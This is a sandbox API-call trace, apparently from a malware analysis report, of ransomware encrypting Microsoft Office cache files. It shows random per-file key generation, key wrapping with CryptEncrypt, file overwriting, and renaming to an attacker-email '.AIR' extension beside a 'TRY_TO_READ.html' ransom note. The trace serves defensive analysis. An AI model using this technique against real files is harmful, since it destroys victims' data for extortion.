	[0084.344] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.344] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.344] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.344] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.344] GetLastError () returned 0x0
	[0084.344] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a02e00, ftCreationTime.dwHighDateTime=0x1cac5f7, ftLastAccessTime.dwLowDateTime=0xe3a02e00, ftLastAccessTime.dwHighDateTime=0x1cac5f7, ftLastWriteTime.dwLowDateTime=0x17e0dbf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1
	[0084.344] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.344] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.344] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.344] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.344] GetLastError () returned 0x0
	[0084.344] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1
	[0084.344] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.344] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.344] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.344] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.344] GetLastError () returned 0x0
	[0084.344] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb2e2000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbb2e2000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1a41c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPlusrWW.msi", cAlternateFileName="PROPLU~1.MSI")) returned 1
	[0084.344] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.344] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.344] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.344] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.344] GetLastError () returned 0x0
	[0084.344] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPlusrWW.xml", cAlternateFileName="PROPLU~1.XML")) returned 1
	[0084.344] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.345] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.345] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.345] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.345] GetLastError () returned 0x0
	[0084.345] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x262b2700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x262b2700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ffd0c0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xa97cbdb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPrWW.cab", cAlternateFileName="")) returned 1
	[0084.345] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.345] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.345] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.345] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.345] GetLastError () returned 0x0
	[0084.345] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf14900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbf14900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xc96ff40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xd49ee31, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPrWW2.cab", cAlternateFileName="")) returned 1
	[0084.345] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.345] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.345] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.345] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.345] GetLastError () returned 0x0
	[0084.345] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec13c00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbec13c00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x1682d290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1
	[0084.345] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.345] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.345] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.345] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.345] GetLastError () returned 0x0
	[0084.345] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0084.345] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.345] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.345] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.345] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.345] GetLastError () returned 0x0
	[0084.345] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9f11bf0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9f11bf0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9f11bf0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0084.345] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.345] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.345] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.345] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.345] GetLastError () returned 0x0
	[0084.345] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9f11bf0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9f11bf0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9f11bf0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0084.346] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc370
	[0084.346] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0084.346] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0084.346] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.346] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.346] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0084.346] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0084.346] GetProcessHeap () returned 0x540000
	[0084.346] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5fb580
	[0084.346] lstrcpyW (in: lpString1=0x5fb580, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml"
	[0084.346] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.346] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.349] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0084.349] GetProcessHeap () returned 0x540000
	[0084.349] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb580 | out: hHeap=0x540000) returned 1
	[0084.349] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=31094) returned 1
	[0084.349] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x7976
	[0084.349] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.349] GetProcessHeap () returned 0x540000
	[0084.349] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.349] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0084.349] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.351] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.351] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.351] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7976) returned 0x5fdb78
	[0084.351] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7976) returned 0x6054f8
	[0084.351] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.351] ReadFile (in: hFile=0x494, lpBuffer=0x5fdb78, nNumberOfBytesToRead=0x7976, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdb78*, lpNumberOfBytesRead=0x3a1f778*=0x7976, lpOverlapped=0x0) returned 1
	[0084.353] SetFilePointer (in: hFile=0x494, lDistanceToMove=-31094, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.353] WriteFile (in: hFile=0x494, lpBuffer=0x6054f8*, nNumberOfBytesToWrite=0x7976, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6054f8*, lpNumberOfBytesWritten=0x3a1f778*=0x7976, lpOverlapped=0x0) returned 1
	[0084.353] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdb78 | out: hHeap=0x540000) returned 1
	[0084.354] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x6054f8 | out: hHeap=0x540000) returned 1
	[0084.354] CloseHandle (hObject=0x494) returned 1
	[0084.355] GetProcessHeap () returned 0x540000
	[0084.355] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0084.355] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0084.355] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0084.355] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc370 | out: hHeap=0x540000) returned 1
	[0084.355] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc2c8 | out: hHeap=0x540000) returned 1
	[0084.355] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc2c8
	[0084.355] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0084.355] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0084.355] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.355] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.355] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe", dwFileAttributes=0x80) returned 1
	[0084.356] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 73
	[0084.356] GetProcessHeap () returned 0x540000
	[0084.356] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5fb580
	[0084.356] lstrcpyW (in: lpString1=0x5fb580, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe"
	[0084.356] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.356] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.358] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0084.358] GetProcessHeap () returned 0x540000
	[0084.358] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb580 | out: hHeap=0x540000) returned 1
	[0084.358] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1377656) returned 1
	[0084.358] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x150578
	[0084.358] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.358] GetProcessHeap () returned 0x540000
	[0084.358] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.358] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0084.358] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.360] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.360] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.360] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x150578) returned 0x3c20020
	[0084.360] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x150578) returned 0x3d80020
	[0084.361] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.361] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x150578, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x150578, lpOverlapped=0x0) returned 1
	[0084.430] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.430] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.430] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab", dwFileAttributes=0x80) returned 1
	[0084.431] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 76
	[0084.431] GetProcessHeap () returned 0x540000
	[0084.431] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0084.431] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab"
	[0084.431] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.431] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.433] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0084.433] GetProcessHeap () returned 0x540000
	[0084.433] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0084.433] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=222948913) returned 1
	[0084.433] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd49ee31
	[0084.433] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.433] GetProcessHeap () returned 0x540000
	[0084.433] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.433] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
